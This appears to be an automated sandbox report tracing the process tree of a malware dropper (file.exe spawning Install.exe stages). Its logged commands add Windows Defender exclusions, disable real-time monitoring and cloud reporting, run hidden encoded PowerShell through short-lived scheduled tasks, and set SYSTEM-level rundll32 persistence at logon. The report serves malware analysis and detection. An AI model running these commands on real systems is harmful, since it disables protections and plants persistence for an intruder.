description pid Process procid_target PID 2028 wrote to memory of 948 2028 file.exe 27 PID 2028 wrote to memory of 948 2028 file.exe 27 PID 2028 wrote to memory of 948 2028 file.exe 27 PID 2028 wrote to memory of 948 2028 file.exe 27 PID 2028 wrote to memory of 948 2028 file.exe 27 PID 2028 wrote to memory of 948 2028 file.exe 27 PID 2028 wrote to memory of 948 2028 file.exe 27 PID 948 wrote to memory of 1760 948 Install.exe 28 PID 948 wrote to memory of 1760 948 Install.exe 28 PID 948 wrote to memory of 1760 948 Install.exe 28 PID 948 wrote to memory of 1760 948 Install.exe 28 PID 948 wrote to memory of 1760 948 Install.exe 28 PID 948 wrote to memory of 1760 948 Install.exe 28 PID 948 wrote to memory of 1760 948 Install.exe 28 PID 1760 wrote to memory of 360 1760 Install.exe 30 PID 1760 wrote to memory of 360 1760 Install.exe 30 PID 1760 wrote to memory of 360 1760 Install.exe 30 PID 1760 wrote to memory of 360 1760 Install.exe 30 PID 1760 wrote to memory of 360 1760 Install.exe 30 PID 1760 wrote to memory of 360 1760 Install.exe 30 PID 1760 wrote to memory of 360 1760 Install.exe 30 PID 1760 wrote to memory of 2040 1760 Install.exe 32 PID 1760 wrote to memory of 2040 1760 Install.exe 32 PID 1760 wrote to memory of 2040 1760 Install.exe 32 PID 1760 wrote to memory of 2040 1760 Install.exe 32 PID 1760 wrote to memory of 2040 1760 Install.exe 32 PID 1760 wrote to memory of 2040 1760 Install.exe 32 PID 1760 wrote to memory of 2040 1760 Install.exe 32 PID 360 wrote to memory of 452 360 forfiles.exe 34 PID 360 wrote to memory of 452 360 forfiles.exe 34 PID 360 wrote to memory of 452 360 forfiles.exe 34 PID 360 wrote to memory of 452 360 forfiles.exe 34 PID 360 wrote to memory of 452 360 forfiles.exe 34 PID 360 wrote to memory of 452 360 forfiles.exe 34 PID 360 wrote to memory of 452 360 forfiles.exe 34 PID 2040 wrote to memory of 576 2040 forfiles.exe 35 PID 2040 wrote to memory of 576 2040 forfiles.exe 35 PID 2040 wrote to memory of 576 2040 forfiles.exe 35 PID 2040 wrote to memory of 576 2040 forfiles.exe 35 PID 2040 wrote to memory of 576 2040 forfiles.exe 35 PID 2040 wrote to memory of 576 2040 forfiles.exe 35 PID 2040 wrote to memory of 576 2040 forfiles.exe 35 PID 452 wrote to memory of 1444 452 cmd.exe 36 PID 452 wrote to memory of 1444 452 cmd.exe 36 PID 452 wrote to memory of 1444 452 cmd.exe 36 PID 452 wrote to memory of 1444 452 cmd.exe 36 PID 452 wrote to memory of 1444 452 cmd.exe 36 PID 452 wrote to memory of 1444 452 cmd.exe 36 PID 452 wrote to memory of 1444 452 cmd.exe 36 PID 576 wrote to memory of 1552 576 cmd.exe 37 PID 576 wrote to memory of 1552 576 cmd.exe 37 PID 576 wrote to memory of 1552 576 cmd.exe 37 PID 576 wrote to memory of 1552 576 cmd.exe 37 PID 576 wrote to memory of 1552 576 cmd.exe 37 PID 576 wrote to memory of 1552 576 cmd.exe 37 PID 576 wrote to memory of 1552 576 cmd.exe 37 PID 452 wrote to memory of 632 452 cmd.exe 39 PID 452 wrote to memory of 632 452 cmd.exe 39 PID 452 wrote to memory of 632 452 cmd.exe 39 PID 452 wrote to memory of 632 452 cmd.exe 39 PID 452 wrote to memory of 632 452 cmd.exe 39 PID 452 wrote to memory of 632 452 cmd.exe 39 PID 452 wrote to memory of 632 452 cmd.exe 39 PID 576 wrote to memory of 856 576 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\7zS58D.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Users\Admin\AppData\Local\Temp\7zS926.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:360 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:452 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1444
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:632
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:576 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1552
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:856
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gwvecawti" /SC once /ST 01:50:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1708
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gwvecawti"4⤵PID:1988
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gwvecawti"4⤵PID:668
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bNHXguvSZYiOwSiXLC" /SC once /ST 06:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\XkDDQQo.exe\" 3x /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1380
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E33DB15E-D42F-4D8F-8FBF-F5AEF7FD41A9} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵PID:1184
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1216
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1664
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1204 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:884
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:452 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1728
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1592
-
C:\Windows\system32\taskeng.exetaskeng.exe {1C569202-D7B9-4F21-BB71-717EF7D0A277} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1812
-
C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\XkDDQQo.exeC:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\XkDDQQo.exe 3x /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1516 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ganGlokNZ" /SC once /ST 00:19:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ganGlokNZ"3⤵PID:816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ganGlokNZ"3⤵PID:388
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1596
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1216
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:768
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "glHharysD" /SC once /ST 04:52:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "glHharysD"3⤵PID:1368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "glHharysD"3⤵PID:924
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:323⤵PID:1376
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:643⤵PID:1952
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:388
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:323⤵PID:1928
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:324⤵PID:1112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:643⤵PID:1596
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:644⤵PID:860
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\MYjwJFnMfsmfKHMw\NPYFcBqQ\ePIwwpmnybgNqopk.wsf"3⤵PID:1216
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\MYjwJFnMfsmfKHMw\NPYFcBqQ\ePIwwpmnybgNqopk.wsf"3⤵
- Modifies data under HKEY_USERS
PID:468 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1444
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:644⤵PID:1820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:324⤵PID:1044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:324⤵PID:884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:324⤵PID:1164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:644⤵PID:1828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fxkldoUMcXUSOxVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fxkldoUMcXUSOxVB" /t REG_DWORD /d 0 /reg:644⤵PID:1632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:324⤵PID:1372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:324⤵PID:452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:644⤵PID:1520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:324⤵PID:1548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:324⤵PID:960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:644⤵PID:1388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:324⤵PID:568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:644⤵PID:1668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:324⤵PID:1312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1828
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fxkldoUMcXUSOxVB" /t REG_DWORD /d 0 /reg:324⤵PID:388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fxkldoUMcXUSOxVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt" /t REG_DWORD /d 0 /reg:644⤵PID:1608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt" /t REG_DWORD /d 0 /reg:324⤵PID:768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:324⤵PID:880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:644⤵PID:1216
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gqWsjYdfh" /SC once /ST 01:29:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2004
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gqWsjYdfh"3⤵PID:1972
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gqWsjYdfh"3⤵PID:2044
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1564
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1952
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1948
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VgOpnHVQDAdMZqNFB" /SC once /ST 05:43:01 /RU "SYSTEM" /TR "\"C:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\XCxlqIJ.exe\" aF /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:388
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "VgOpnHVQDAdMZqNFB"3⤵PID:1632
-
-
-
C:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\XCxlqIJ.exeC:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\XCxlqIJ.exe aF /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1596 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bNHXguvSZYiOwSiXLC"3⤵PID:1960
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1616
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1720
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1740
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\SHsJRQZsU\Wtwvvd.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "DNDvMcbpefrYjKZ" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DNDvMcbpefrYjKZ2" /F /xml "C:\Program Files (x86)\SHsJRQZsU\rBrrglm.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:336
-
-
